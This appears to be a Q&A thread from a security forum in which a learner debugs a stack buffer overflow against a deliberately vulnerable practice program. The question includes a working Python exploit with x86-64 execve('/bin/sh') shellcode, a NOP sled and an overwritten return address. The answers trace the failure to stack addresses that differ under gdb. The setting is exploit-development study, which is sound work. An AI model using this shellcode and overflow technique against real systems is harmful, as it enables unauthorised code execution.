# Why Does Only 1 Of These 2 Almost-identical Payloads Give Me A Shell?

Tags: exploit, buffer-overflow, shellcode, stack-overflow

I wrote a vulnerable test program to practice buffer overflows; however, I was having trouble getting it to work. Finally, after slightly modifying the return address, I was able to gain a shell, but I don't understand why this small, seemingly-insignificant change fixed my issue.

**vuln.c**

```
/**
 * Compile:
 *
 * $ gcc -fno-stack-protector -z execstack -o vuln vuln.c
 */

#include <stdio.h>
#include <string.h>

int main(void)
{
    char buffer[256];

    gets(buffer);

    if (strcmp(buffer, "password") == 0)
    {
        printf("PASS\n");
    }
    else
    {
        printf("FAIL\n");
    }

    return 0;
}
```

**exploit.py**

```
#!/usr/bin/python
# -*- coding: utf-8 -*-


import os
import struct
import sys



# Start-of-buffer = 0x00007fffffffdc50
if len(sys.argv) != 2:
    sys.stderr.write('Usage: {progname!s} return-addr{linesep!s}'.format(
            progname=__file__, linesep=os.linesep
            )
        )
    sys.exit(1)
else:
    return_addr = int(sys.argv[1], 16)


shellcode = b''.join([
        b'\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68',    # mov     rax, 0x68732f6e69622f2f   ; "hs/nib//" => "//bin/sh"
        b'\x48\xc1\xe8\x08',                            # shr     rax, 8
        b'\x50',                                        # push    rax
        b'\x48\x89\xe7',                                # mov     rdi, rsp
        b'\x48\x31\xc0',                                # xor     rax, rax
        b'\x50',                                        # push    rax
        b'\x57',                                        # push    rdi
        b'\x48\x89\xe6',                                # mov     rsi, rsp
        b'\x50',                                        # push    rax
        b'\x48\x89\xe2',                                # mov     rdx, rsp
        b'\xb0\x3b',                                    # mov     al, 59

        b'\x0f\x05',                                    # syscall
        ]
    )

PAYLOAD_SIZE = 256 + 8 + 8

padding = b'\x41' * 32

nopsled = b'\x90' * (PAYLOAD_SIZE - len(shellcode) - 8 - 8 - len(padding))

rbp = struct.pack('<Q', 0x4242424242424242)

rip = struct.pack('<Q', return_addr)

payload = nopsled + shellcode + padding + rbp + rip


sys.stdout.buffer.write(payload)
```

When I execute the following, I get a SEGFAULT:

```
$ { python exploit.py 0x00007fffffffdc50 ; echo ; cat - } | ./vuln
```

However, this gives me a shell:

```
$ { python exploit.py 0x00007fffffffdcd0 ; echo ; cat - } | ./vuln
```

#### Note

I disabled ASLR during my testing.

```
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```

#### Other considerations

```
$ uname -r
4.19.81-1-MANJARO
$ gcc --version
gcc (GCC) 9.2.0
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
```

Answer (score 2, accepted):

How are you determining the address of `buffer[]`? If you're running the app under gdb, printing the address, and then running the exploit script using that address against the application running outside gdb, then note that the stack may be at a different address depending on whether you're running under gdb!

For example, I modified vuln.c to print the address when it starts:

`printf("%p\n", &buffer[0]);`

When I run the application directly, the result is consistently one address:

`$ echo x | ./tmp
0x7fffffffe1f0`

... but when I run the application under gdb, the result is consistently a different address:

`$ echo x | gdb -ex run ./tmp
...
0x7fffffffe1a0`

The difference between those two values may be the "0x...50 <-> 0x...d0" difference you're having to apply in order to get the exploit to work.

Now if I use the non-gdb buffer address when running the app outside gdb, the exploit works as expected.

`$ ./tmp-exploit.py 0x7fffffffe1f0 | ./tmp
0x7fffffffe1f0
FAIL`

`$ ./tmp-exploit.py 0x7fffffffe1a0 | gdb -ex run ./tmp
...
0x7fffffffe1a0
FAIL
process 23430 is executing new program: /bin/dash
[Inferior 1 (process 23430) exited normally]
(gdb) quit`

Comment: That is exactly what I was doing -- running the executable under GDB, printing the address, and then re-running it outside of GDB and passing it this address. Thank you for your in-depth explanation and for answering my question!

Answer (score 1):

This is a bit of a guess without information such as:

- Details of the segfault.
- Disassembly of the vulnerable application binary.

The C compiler knows that `buffer[]` isn't used after the call to `strcmp()`, and hence may re-use it for other purposes between the return from `strcmp()` and return from `main()`. This may corrupt the first few bytes of `buffer[]`, causing it to contain invalid instructions, causing the segfault.

To confirm this, run the vulnerable application under `gdb`, put a breakpoint in `main()` after `gets()` returns and dump `buffer[]`. Record the address of `buffer`. Continue the application and wait for the segfault. Now dump the memory of `buffer[]` again and check if the content still contains the nopsled, or whether it's been over-written.

By changing from `0x...50` to `0x...90` you're jumping to a later part of the payload and skipping the corrupted portion.

Comment: So, what i wrote above is a legitimate possibility in general. However, having played a bit with the code in the question, I'm not sure it is an explanation in this case; on Ubuntu 18.04 using the default gcc, I can reproduce the difference in behavior based on return address after a tiny change to the program, and there's no change to the data in buffer[]. Strangely, it always works under gdb. Something more involved is going on. I wonder if this exploit is tripping some anti-buffer-overflow protection that's not yet disabled for the test?

Comment: Well, running under gdb shows no corruption of buffer[], but when I run without gdb with core dumps enabled, then disassemble buffer[], I *do* see the first 64 bytes replaced with some other content, which explains the issue very well...

Answer (score 0):

Changing something small in a payload can have huge effects on the success or failure of an attempt. I assume the small change allowed the payload to be put in an acceptable location to hijack the programs execution while the former only overwrote some of the buffers but caused a crash.

Comment: I ran the vulnerable executable in GDB with both payloads, and both times, the shellcode was executed. The only difference that I can see is the number of NOPs that get executed.

Comment: Executing with different return addresses near the one that worked the return address step by step and seeing how many NOPS get executed.